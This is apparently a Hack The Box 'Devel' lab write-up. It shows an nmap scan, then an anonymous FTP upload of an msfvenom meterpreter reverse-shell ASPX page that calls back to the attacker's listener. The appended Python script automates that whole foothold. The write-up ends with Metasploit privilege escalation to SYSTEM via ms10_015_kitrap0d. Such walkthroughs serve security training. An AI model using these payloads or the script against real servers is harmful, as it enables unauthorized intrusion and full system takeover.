[HTB] Devel

Scanning with nmap

The nmap scan results show that anonymous FTP login is allowed.


I explored the FTP directory but couldn't find any useful information on the server.


Because the HTTP server on port 80 is also open, I navigated to the address in Firefox.


More information gathering

Then I tried gathering more information, which did not help much, and that made me realize there was an easier way to go about this. Because the FTP server accepted anonymous uploads into the directory the web server serves, I could just generate a payload, upload it, and request it through the web server to pop a reverse shell.



Generating a payload

I generated a reverse shell payload with msfvenom. The format is asp, since we saw that extension on the FTP server.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f asp > reverse.aspx

Note the mismatch between the format flag and the file name: -f asp emits classic ASP (VBScript), while IIS compiles a .aspx file as an ASP.NET page. If the request returns a server error instead of a callback, regenerate with -f aspx so the format matches the extension.



I uploaded the reverse shell I had generated to the FTP server using the put command.



Before navigating to http://10.10.10.5/reverse.aspx, I started a netcat listener on the port with the following command: nc -lvnp 1234


For some reason, my netcat listener kept crashing. As an alternative, I switched to msfconsole and used exploit/multi/handler to catch the connection. This is expected with this payload: windows/meterpreter/reverse_tcp is staged, so the page only runs a small stager that connects back and waits for the handler to send the Meterpreter stage. A plain netcat listener cannot deliver that stage, so the session dies; multi/handler can, and a non-staged payload such as windows/shell_reverse_tcp would have worked with netcat.



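To put the whole foothold in one place, here is an added example (not the author's code from this writeup) that automates the steps above: it matches the msfvenom format to the file extension, logs in to FTP anonymously with ftplib, uploads the page, and requests it over HTTP to trigger the callback. The addresses are the ones used in the post; the helper names and the msfconsole one-liner for multi/handler are this example's own assumptions.

```python
#!/usr/bin/env python3
"""Automate the Devel foothold: anonymous FTP upload, then trigger over HTTP.

Added example, not code from the original writeup. The addresses (target
10.10.10.5, attacker 10.10.14.15:1234) come from the post; the helper names and
the msfvenom/msfconsole invocations are this example's own assumptions.
"""
import ftplib
import subprocess
import urllib.error
import urllib.request

TARGET = "10.10.10.5"
LHOST, LPORT = "10.10.14.15", 1234
PAYLOAD = "windows/meterpreter/reverse_tcp"

# IIS compiles .aspx as ASP.NET (C#) and .asp as classic ASP (VBScript); the
# msfvenom format must match the extension or the server returns an error page.
FORMATS = {"asp": "asp", "aspx": "aspx"}


def payload_format(filename: str) -> str:
    """Return the msfvenom -f value matching the file extension, or raise."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in FORMATS:
        raise ValueError(f"{filename}: use a .asp or .aspx name so IIS executes it")
    return FORMATS[ext]


def msfvenom_cmd(filename: str, lhost: str = LHOST, lport: int = LPORT,
                 payload: str = PAYLOAD) -> list[str]:
    """Build the msfvenom argv for a web shell written to `filename`."""
    return ["msfvenom", "-p", payload, f"LHOST={lhost}", f"LPORT={lport}",
            "-f", payload_format(filename), "-o", filename]


def handler_cmd(lhost: str = LHOST, lport: int = LPORT,
                payload: str = PAYLOAD) -> list[str]:
    """msfconsole one-liner for the staged handler that netcat cannot replace."""
    rc = (f"use exploit/multi/handler; set PAYLOAD {payload}; "
          f"set LHOST {lhost}; set LPORT {lport}; run -j")
    return ["msfconsole", "-q", "-x", rc]


def anonymous_login(host: str) -> ftplib.FTP:
    """Log in as anonymous (ftplib's default credentials) and return the session."""
    ftp = ftplib.FTP(host, timeout=10)
    ftp.login()
    return ftp


def upload(ftp: ftplib.FTP, local_path: str, remote_name: str) -> bool:
    """STOR the file and confirm it shows up in the directory listing."""
    with open(local_path, "rb") as fh:
        ftp.storbinary(f"STOR {remote_name}", fh)
    return remote_name in ftp.nlst()


def trigger(url: str, timeout: float = 5.0) -> None:
    """Request the page so IIS executes it and the stager connects back.

    The HTTP response usually never completes once the shell is running, so a
    timeout here is the expected outcome rather than a failure.
    """
    try:
        urllib.request.urlopen(url, timeout=timeout)
    except (urllib.error.URLError, OSError):
        pass


def main() -> None:
    name = "reverse.aspx"
    subprocess.run(msfvenom_cmd(name), check=True)
    print("start this in another terminal:", " ".join(repr(a) for a in handler_cmd()))
    input("press Enter once the handler is listening...")
    ftp = anonymous_login(TARGET)
    if not upload(ftp, name, name):
        raise SystemExit("upload not visible in the FTP listing")
    ftp.quit()
    trigger(f"http://{TARGET}/{name}")


if __name__ == "__main__":
    main()
```

The upload check (looking for the name in nlst) is what tells you the FTP root really is writable before you spend time on the listener; if the file is not listed, the web request will just return 404.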


I got the shell, but the user was a low-privileged account that couldn't access many directories. As you can see from the picture below, getuid returned IIS APPPOOL\Web, which is not the administrator. It was time for privilege escalation to move vertically and gain higher access.



After some research, I learned that Metasploit has post modules that run against an existing meterpreter session. So I backgrounded the current session and searched for the module: search type:post path:post/multi.



As the name of the module (post/multi/recon/local_exploit_suggester) implies, it suggested several candidate exploits, and I decided to use the 3rd one, exploit/windows/local/ms10_015_kitrap0d. This module targets 32-bit Windows and needs an x86 meterpreter session, which the windows/meterpreter/reverse_tcp payload used above provides.



I set SESSION to 1, because the backgrounded session is the only one we have, and set the other required options.



I succeeded in getting a SYSTEM shell. getuid returned NT AUTHORITY\SYSTEM, the Windows equivalent of root.


Found the user flag.


Found the root flag.



#Hack The Box